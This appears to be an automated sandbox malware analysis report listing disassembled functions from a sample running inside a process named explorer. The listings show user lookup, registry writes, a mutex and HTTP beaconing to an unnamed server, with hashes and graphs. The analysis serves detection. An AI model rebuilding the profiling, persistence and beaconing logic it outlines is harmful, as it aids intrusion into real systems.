                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Open$Close$Value$InternetNameQuery$ConnectEnumFileGdiplusHttpInfoModuleRequestSleepStartupUser
                                                  • String ID: 246122658369$8a680c$Im==$NI5CJv==$PwN+$PwR+$R$System$YNJa$YNZa$Ycla$Zw1a$aMRa$bSda$bTNa$bxZa$c 1=$cSRa$cTRd r==$cwNa$dM5a$ddNa$invalid stoi argument$stoi argument out of range
                                                  • API String ID: 2912196086-75614579
                                                  • Opcode ID: 83b0fbd95d0e6ffb417caf243991ee2cb73a4857f4fcba573c3004470296d730
                                                  • Instruction ID: 4fd48d5bfcf2003b9ce5c36405b48c52ffefe22af355fbc850b53243e6a36618
                                                  • Opcode Fuzzy Hash: 83b0fbd95d0e6ffb417caf243991ee2cb73a4857f4fcba573c3004470296d730
                                                  • Instruction Fuzzy Hash: 67131671A20268ABDB19DB28CE8879DFF76AF45304F5082D8D408AB2D5DB754FC48F91
                                                  Function 0321F4B0 Relevance: 40.1, APIs: 4, Strings: 18, Instructions: 1574registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 032061F0: GetUserNameA.ADVAPI32(?,?), ref: 032075BA
                                                    • Part of subcall function 032061F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 03207600
                                                    • Part of subcall function 032061F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0320760D
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0321F592
                                                  • RegCloseKey.KERNELBASE(80000002), ref: 0321F5A8
                                                  • GetUserNameA.ADVAPI32(?,80000002), ref: 0321F632
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0321F6BD
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                  • String ID: 246122658369$8a680c$NI5CJv==$System$V$YNJa$YNZa$Ycla$Zw1a$aMRa$bSda$bTNa$bxZa$c 1=$cSRa$cwNa$dM5a$ddNa
                                                  • API String ID: 4106312383-458430745
                                                  • Opcode ID: e2a7863294dca71ad95b3097127b2e2eb960cfb8a258fef79720caba3d25766e
                                                  • Instruction ID: cb3e8ec39e4e655dd2cbe8e0b9995d0060be32e8e4115621b031cd83d3f88c64
                                                  • Opcode Fuzzy Hash: e2a7863294dca71ad95b3097127b2e2eb960cfb8a258fef79720caba3d25766e
                                                  • Instruction Fuzzy Hash: AFD20571921268ABEB29D728CE8879DFE769F81304F50C2D8D048AB2D6DB754FC48F51
                                                  Function 032105B0 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 312networkfilesleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2329 32105b0-32105fc 2330 3210602-3210606 2329->2330 2331 3210a07-3210a32 call 3224250 2329->2331 2330->2331 2333 321060c-3210610 2330->2333 2337 3210a60-3210a78 2331->2337 2338 3210a34-3210a40 2331->2338 2333->2331 2334 3210616-32106b4 Sleep InternetOpenW InternetConnectA call 3223340 call 32061f0 2333->2334 2362 32106b6 2334->2362 2363 32106b8-32106d4 HttpOpenRequestA 2334->2363 2342 32109be-32109d6 2337->2342 2343 3210a7e-3210a8a 2337->2343 2340 3210a42-3210a50 2338->2340 2341 3210a56-3210a5d call 322a036 2338->2341 2340->2341 2347 3210adb-3210ae0 call 322f02c 2340->2347 2341->2337 2344 32109dc-32109e8 2342->2344 2345 3210aaf-3210acb call 32299c0 2342->2345 2349 3210a90-3210a9e 2343->2349 2350 32109b4-32109bb call 322a036 2343->2350 2351 3210aa5-3210aac call 322a036 2344->2351 2352 32109ee-32109fc 2344->2352 2349->2347 2358 3210aa0 2349->2358 2350->2342 2351->2345 2352->2347 2360 3210a02 2352->2360 2358->2350 2360->2351 2362->2363 2367 3210705-3210774 call 3223340 call 32061f0 call 3223340 call 32061f0 2363->2367 2368 32106d6-32106e5 2363->2368 2381 3210776 2367->2381 2382 3210778-321078e HttpSendRequestA 2367->2382 2369 32106e7-32106f5 2368->2369 2370 32106fb-3210702 call 322a036 2368->2370 2369->2370 2370->2367 2381->2382 2383 3210790-321079f 2382->2383 2384 32107bf-32107e7 2382->2384 2385 32107a1-32107af 2383->2385 2386 32107b5-32107bc call 322a036 2383->2386 2387 32107e9-32107f8 2384->2387 2388 3210818-3210839 InternetReadFile 2384->2388 2385->2386 2386->2384 2391 32107fa-3210808 2387->2391 2392 321080e-3210815 call 322a036 2387->2392 2389 321083f 2388->2389 2394 3210840-32108f0 call 322b0d0 InternetReadFile 2389->2394 2391->2392 2392->2388
                                                  APIs
                                                  • Sleep.KERNELBASE(000005DC,74D40A26,?,00000000), ref: 03210642
                                                  • InternetOpenW.WININET(0325DB50,00000000,00000000,00000000,00000000), ref: 03210651
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 03210675
                                                  • HttpOpenRequestA.WININET(?,00000000), ref: 032106BF
                                                  • HttpSendRequestA.WININET(?,00000000), ref: 0321077F
                                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 03210831
                                                  • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 032108E0
                                                  • InternetCloseHandle.WININET(?), ref: 03210907
                                                  • InternetCloseHandle.WININET(?), ref: 0321090F
                                                  • InternetCloseHandle.WININET(?), ref: 03210917
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                  • String ID: Uu YSv==$axS5 CIZPzb=$axS5 ykoPx==$invalid stoi argument$stoi argument out of range
                                                  • API String ID: 1439999335-2146650194
                                                  • Opcode ID: 8504c0b66ee2d4a6319b6bedcde23fc680ef000c6d3e1fe75579ba5d160320f4
                                                  • Instruction ID: 4af1af19a340ac8fcfd2098e9e3e9ed8bda6f8eef629bc5b8f985ea02e7c73a5
                                                  • Opcode Fuzzy Hash: 8504c0b66ee2d4a6319b6bedcde23fc680ef000c6d3e1fe75579ba5d160320f4
                                                  • Instruction Fuzzy Hash: 69B118B1A202189FDB24DF28CD84B9EBBB9EF45304F4081A8F509972C1DB719AD4CF95
                                                  Function 0323EC2F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2764 323ec2f-323ec5f call 323e55d call 323e563 call 323e5c1 2771 323ec65-323ec71 call 323e569 2764->2771 2772 323ed7e-323edda call 322f049 call 3246697 2764->2772 2771->2772 2777 323ec77-323ec83 call 323e595 2771->2777 2784 323ede4-323ede7 2772->2784 2785 323eddc-323ede2 2772->2785 2777->2772 2783 323ec89-323ecaa call 32381b6 GetTimeZoneInformation 2777->2783 2798 323ecb0-323ecd0 2783->2798 2799 323ed5b-323ed7d call 323e557 call 323e54b call 323e551 2783->2799 2788 323ede9-323edeb 2784->2788 2789 323eded-323ee00 call 32383e5 2784->2789 2786 323ee31-323ee43 2785->2786 2790 323ee53 2786->2790 2791 323ee45-323ee48 2786->2791 2788->2786 2801 323ee02 2789->2801 2802 323ee0c-323ee25 call 3246697 2789->2802 2796 323ee58-323ee6d call 32381b6 call 32299c0 2790->2796 2797 323ee53 call 323ec2f 2790->2797 2791->2790 2794 323ee4a-323ee51 call 323e98e 2791->2794 2794->2796 2797->2796 2805 323ecd2-323ecd7 2798->2805 2806 323ecda-323ece2 2798->2806 2810 323ee03-323ee0a call 32381b6 2801->2810 2824 323ee27-323ee28 2802->2824 2825 323ee2a-323ee2b call 32381b6 2802->2825 2805->2806 2807 323ecf4-323ecf6 2806->2807 2808 323ece4-323eceb 2806->2808 2815 323ecf8-323ed58 call 322b650 * 4 call 3232a17 call 323ee6e * 2 2807->2815 2808->2807 2814 323eced-323ecf2 2808->2814 2827 323ee30 2810->2827 2814->2815 2815->2799 2824->2810 2825->2827 2827->2786
                                                  APIs
                                                  • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0323EE50,?,?,00000000), ref: 0323ECA1
                                                  • _free.LIBCMT ref: 0323EC8F
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 0323EE59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 2155170405-239921721
                                                  • Opcode ID: 53e9b0cd8d5a6095fc7f2c486994651547a9e3e33af69beaaa0c356c990f288c
                                                  • Instruction ID: 91143b2c6cf5aad0c07a072d7b50627405b07f11b4e92b37cc83e2c0ce506366
                                                  • Opcode Fuzzy Hash: 53e9b0cd8d5a6095fc7f2c486994651547a9e3e33af69beaaa0c356c990f288c
                                                  • Instruction Fuzzy Hash: 7D5109B7821325ABCB10FF64DD4599EBB78EF02620F158156E514AB190EB709EC4CBD0
                                                  Function 0323080C Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2843 323080c-3230841 GetFileType 2844 3230847-3230852 2843->2844 2845 32308f9-32308fc 2843->2845 2846 3230874-3230890 call 322b650 GetFileInformationByHandle 2844->2846 2847 3230854-3230865 call 3230b82 2844->2847 2848 3230925-323094d 2845->2848 2849 32308fe-3230901 2845->2849 2860 3230916-3230923 GetLastError call 323122c 2846->2860 2861 3230896-32308d8 call 3230ad4 call 323097c * 3 2846->2861 2865 3230912-3230914 2847->2865 2866 323086b-3230872 2847->2866 2850 323096a-323096c 2848->2850 2851 323094f-3230962 PeekNamedPipe 2848->2851 2849->2848 2854 3230903-3230905 2849->2854 2856 323096d-323097b call 32299c0 2850->2856 2851->2850 2855 3230964-3230967 2851->2855 2859 3230907-323090c call 3231262 2854->2859 2854->2860 2855->2850 2859->2865 2860->2865 2877 32308dd-32308f5 call 3230aa1 2861->2877 2865->2856 2866->2846 2877->2850 2880 32308f7 2877->2880 2880->2865
                                                  APIs
                                                  • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0323073E), ref: 0323082E
                                                  • GetFileInformationByHandle.KERNELBASE(?,?), ref: 03230888
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0323073E,?,000000FF,00000000,00000000), ref: 03230916
                                                  • __dosmaperr.LIBCMT ref: 0323091D
                                                  • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0323095A
                                                    • Part of subcall function 03230B82: __dosmaperr.LIBCMT ref: 03230BB7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                  • String ID:
                                                  • API String ID: 1206951868-0
                                                  • Opcode ID: e253a6ef00f016510ebed160c6f259b9ab2cc22a366ad6de2430a0b4075f56ac
                                                  • Instruction ID: 871a0e5e4b13112088059755c3450fff8c7e297ddd64dad9adee9302fd25932b
                                                  • Opcode Fuzzy Hash: e253a6ef00f016510ebed160c6f259b9ab2cc22a366ad6de2430a0b4075f56ac
                                                  • Instruction Fuzzy Hash: BE417FB6920349AFDF24EFB5D844AAFBBF9EF49610B04841DE557D7210E730A991CB20
                                                  Function 0320C6D0 Relevance: 6.0, APIs: 4, Instructions: 36sleepsynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3828 320c6d0-320c707 Sleep CreateMutexA GetLastError 3829 320c709-320c70b 3828->3829 3830 320c71a-320c71b 3828->3830 3829->3830 3831 320c70d-320c718 GetLastError 3829->3831 3831->3830 3832 320c71c-320c723 call 322df5e 3831->3832
                                                  APIs
                                                  • Sleep.KERNELBASE(00000096), ref: 0320C6D6
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,03267494), ref: 0320C6F4
                                                  • GetLastError.KERNEL32 ref: 0320C6FC
                                                  • GetLastError.KERNEL32 ref: 0320C70D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateMutexSleep
                                                  • String ID:
                                                  • API String ID: 3645482037-0
                                                  • Opcode ID: 61dcffb7e3202cd49dfcb70d2da5a4fe1bc50b32db1496ed1f32b66e487026bd
                                                  • Instruction ID: d85730f1e4eb32fbf89e225186809e78b4c5130ca6b666d11a3bd46f44e44baa
                                                  • Opcode Fuzzy Hash: 61dcffb7e3202cd49dfcb70d2da5a4fe1bc50b32db1496ed1f32b66e487026bd
                                                  • Instruction Fuzzy Hash: 97E0D871104340EBEB507B6DF44C70E3A2ADB80761F148510EE19CA1CEC77158C08611
                                                  Function 0323ED89 Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3835 323ed89-323edda call 3246697 3838 323ede4-323ede7 3835->3838 3839 323eddc-323ede2 3835->3839 3841 323ede9-323edeb 3838->3841 3842 323eded-323ee00 call 32383e5 3838->3842 3840 323ee31-323ee43 3839->3840 3843 323ee53 3840->3843 3844 323ee45-323ee48 3840->3844 3841->3840 3851 323ee02 3842->3851 3852 323ee0c-323ee25 call 3246697 3842->3852 3848 323ee58-323ee6d call 32381b6 call 32299c0 3843->3848 3849 323ee53 call 323ec2f 3843->3849 3844->3843 3846 323ee4a-323ee51 call 323e98e 3844->3846 3846->3848 3849->3848 3855 323ee03-323ee0a call 32381b6 3851->3855 3863 323ee27-323ee28 3852->3863 3864 323ee2a-323ee2b call 32381b6 3852->3864 3865 323ee30 3855->3865 3863->3855 3864->3865 3865->3840
                                                  APIs
                                                  • _free.LIBCMT ref: 0323EE59
                                                    • Part of subcall function 0323EC2F: _free.LIBCMT ref: 0323EC8F
                                                    • Part of subcall function 0323EC2F: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0323EE50,?,?,00000000), ref: 0323ECA1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 597776487-0
                                                  • Opcode ID: e2cee9fd6c1569cf2fe2d46c10f6de3e56d5f18ea7e53bfdb5252c4ef2723606
                                                  • Instruction ID: 7b5de7bd501be59a870fcc51f3eba6da85d7666beba7c495eb5c040b74ca78a8
                                                  • Opcode Fuzzy Hash: e2cee9fd6c1569cf2fe2d46c10f6de3e56d5f18ea7e53bfdb5252c4ef2723606
                                                  • Instruction Fuzzy Hash: 6C21DAF783131956CB20FA249C4899B777C9F82630F164299E965AB281EF70DECC8590
                                                  Function 032306A4 Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3867 32306a4-32306b0 3868 32306b2-32306ce call 323124f call 3231262 call 322f01c 3867->3868 3869 32306cf-32306f3 call 322b650 3867->3869 3875 3230711-3230733 CreateFileW 3869->3875 3876 32306f5-323070f call 323124f call 3231262 call 322f01c 3869->3876 3877 3230743-323074a call 3230782 3875->3877 3878 3230735-3230739 call 323080c 3875->3878 3898 323077d-3230781 3876->3898 3889 323074b-323074d 3877->3889 3885 323073e-3230741 3878->3885 3885->3889 3892 323076f-3230772 3889->3892 3893 323074f-323076c call 322b650 3889->3893 3896 3230774-3230775 CloseHandle 3892->3896 3897 323077b 3892->3897 3893->3892 3896->3897 3897->3898
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ff9413ea9842f0c4fcf23204a58193b95c5d13a1502384d15ca22ff827f9757
                                                  • Instruction ID: 939365b24e68674c74f18c24b926bba3670bc92f31cbe17e45416bc0f1ce55c5
                                                  • Opcode Fuzzy Hash: 2ff9413ea9842f0c4fcf23204a58193b95c5d13a1502384d15ca22ff827f9757
                                                  • Instruction Fuzzy Hash: E62108B1910318BAEF11FB689C45BAE37299F42774F108310F9356F1D0D7B0AE519A71
                                                  Function 03236952 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3900 3236952-3236957 3901 3236959-3236971 3900->3901 3902 3236973-3236977 3901->3902 3903 323697f-3236988 3901->3903 3902->3903 3906 3236979-323697d 3902->3906 3904 323699a 3903->3904 3905 323698a-323698d 3903->3905 3910 323699c-32369a9 GetStdHandle 3904->3910 3908 3236996-3236998 3905->3908 3909 323698f-3236994 3905->3909 3907 32369f8-32369fc 3906->3907 3907->3901 3911 3236a02-3236a05 3907->3911 3908->3910 3909->3910 3912 32369ab-32369ad 3910->3912 3913 32369b8 3910->3913 3912->3913 3914 32369af-32369b6 GetFileType 3912->3914 3915 32369ba-32369bc 3913->3915 3914->3915 3916 32369da-32369ec 3915->3916 3917 32369be-32369c7 3915->3917 3916->3907 3920 32369ee-32369f1 3916->3920 3918 32369c9-32369cd 3917->3918 3919 32369cf-32369d2 3917->3919 3918->3907 3919->3907 3921 32369d4-32369d8 3919->3921 3920->3907 3921->3907
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0323699E
                                                  • GetFileType.KERNELBASE(00000000), ref: 032369B0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: 490dccad30ca8f1fb075678fbd44de1071aff92829cef957301e059e5622d176
                                                  • Instruction ID: f6fd0cf6c524ef67723de60ad92094a40f1e36b18970e95815232d6ef0ba9d4e
                                                  • Opcode Fuzzy Hash: 490dccad30ca8f1fb075678fbd44de1071aff92829cef957301e059e5622d176
                                                  • Instruction Fuzzy Hash: 8A11B4B1124743AACB30CA3E8CDC622FAACAB57131B2C079AD0B6D65F1C770E5D58240
                                                  Function 0323097C Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3922 323097c-3230992 3923 32309a2-32309b2 FileTimeToSystemTime 3922->3923 3924 3230994-3230998 3922->3924 3926 32309f2-32309f5 3923->3926 3927 32309b4-32309c6 SystemTimeToTzSpecificLocalTime 3923->3927 3924->3923 3925 323099a-32309a0 3924->3925 3928 32309f7-3230a02 call 32299c0 3925->3928 3926->3928 3927->3926 3929 32309c8-32309e8 call 3230a03 3927->3929 3932 32309ed-32309f0 3929->3932 3932->3928
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,032308B3,?,?,00000000,00000000), ref: 032309AA
                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,032308B3,?,?,00000000,00000000), ref: 032309BE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Time$System$FileLocalSpecific
                                                  • String ID:
                                                  • API String ID: 1707611234-0
                                                  • Opcode ID: c296ed00d7140142aca33aa7bd638e6be678bc9cf0930217fa8cdf9f8e943787
                                                  • Instruction ID: 869186e72abee4b6d9da1eba64e4345b59e80480f1f613bcb318c4424b20dce2
                                                  • Opcode Fuzzy Hash: c296ed00d7140142aca33aa7bd638e6be678bc9cf0930217fa8cdf9f8e943787
                                                  • Instruction Fuzzy Hash: 23111CB291020DABDF00DE95C984ADFB7BCAF49610F148266E516E6180EB70EB94CB71
                                                  Function 03220DB0 Relevance: 3.0, APIs: 2, Instructions: 23sleepthreadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0320C6D0: Sleep.KERNELBASE(00000096), ref: 0320C6D6
                                                    • Part of subcall function 0320C6D0: CreateMutexA.KERNELBASE(00000000,00000000,03267494), ref: 0320C6F4
                                                    • Part of subcall function 0320C6D0: GetLastError.KERNEL32 ref: 0320C6FC
                                                    • Part of subcall function 0320C6D0: GetLastError.KERNEL32 ref: 0320C70D
